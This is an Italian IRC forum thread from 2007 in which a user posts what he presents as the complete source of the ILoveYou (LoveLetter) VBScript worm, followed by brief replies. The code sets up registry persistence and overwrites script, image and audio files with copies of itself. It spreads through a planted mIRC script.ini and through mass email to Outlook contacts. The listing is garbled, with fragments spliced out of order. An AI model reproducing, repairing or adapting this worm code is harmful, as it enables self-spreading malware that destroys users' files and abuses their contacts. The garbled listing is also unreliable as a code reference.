Azzurra IRC Network Forum

il virus ILoveYou.vbs resuscita!!!!

domy94 · 23/03/2007 13:51 · #1
dopo tante ricerche alla fine sono riuscito a far resuscitare i virus ILoveYou ecco il codice per intero:


rem barok -loveletter(vbe)
rem by: spyder / staff@gmail.com /
@loveletter /
domy94,italia,
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-
YOU.TXT.vbs")
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Win
dows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
la stessa sorte tocca ai file .mp3 e .mp2
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe")
or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folder-
spec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit
this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS
will affect and will not run
"HKEY_LOCAL_MACHINE\Software\Microsoft\Win
dows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Softwa-
re\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or
(ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick ==
$me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\So
ftware\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv))
then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\S
oftware\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the atta-
ched LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LET-
TER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\
"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\
"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\
"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
On Error Resume Next
dim
lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,d
t6
dta1="<HTML><HEAD><TITLE>LOVELETTER -
HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS
- LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder
?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines
?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-
@simple but i think this is

che ne dite??
^TaRa^ · 23/03/2007 14:24 · #2
Lamer
domy94 · 23/03/2007 14:48 · #3
nn è per rimetterlo in circolo e solo a scopo di migliorare la programmazione e poi è obloseto e tutti gli antivirus lo riconoscono!
tofolix · 17/03/2008 18:45 · #4
cosa farebbe questo virus????
Alex1 · 18/03/2008 07:09 · #5
non uppare thread di oltre un anno fa